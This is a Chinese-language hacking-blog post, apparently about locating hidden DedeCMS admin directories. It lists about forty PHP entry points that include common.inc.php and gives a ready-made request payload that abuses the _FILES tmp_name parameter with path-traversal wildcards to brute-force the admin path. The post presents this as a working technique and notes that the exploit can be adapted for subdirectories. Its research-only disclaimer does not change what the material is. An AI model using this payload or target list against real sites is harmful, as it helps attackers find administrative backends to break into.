现在好多朋友在聊天的时候说的意思就是 现在后台好多都无法查找到了
tags.php和index.php不能跑了 那不是没戏
了解详情请访问
https://www.0dayhack.com/post-801.html
其实在上一文中都解释过吧
核心文件common.inc.php
只要是包含了他都可以跑
总结了一下
/install/module_autos.php /m/index.php /m/list.php /m/view.php /member/config.php /plus/ad_js.php /plus/advancedsearch.php /plus/arcmulti.php /plus/bookfeedback.php /plus/bookfeedback_js.php /plus/car.php /plus/carbuyaction.php /plus/comments_frame.php /plus/count.php /plus/digg_ajax.php /plus/digg_frame.php /plus/disdls.php /plus/diy.php /plus/download.php /plus/erraddsave.php /plus/feedback.php /plus/feedback_ajax.php /plus/feedback_js.php /plus/flink.php /plus/flink_add.php /plus/freelist.php /plus/guestbook.php /plus/heightsearch.php /plus/list.php /plus/mytag_js.php /plus/posttocar.php /plus/qrcode.php /plus/recommend.php /plus/rss.php /plus/search.php /plus/showphoto.php /plus/stow.php /plus/task.php /plus/view.php /plus/vote.php
二级目录爆破的话改下exp就好了
dopost=save&_FILES[b4dboy][tmp_name]=../$v$vv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论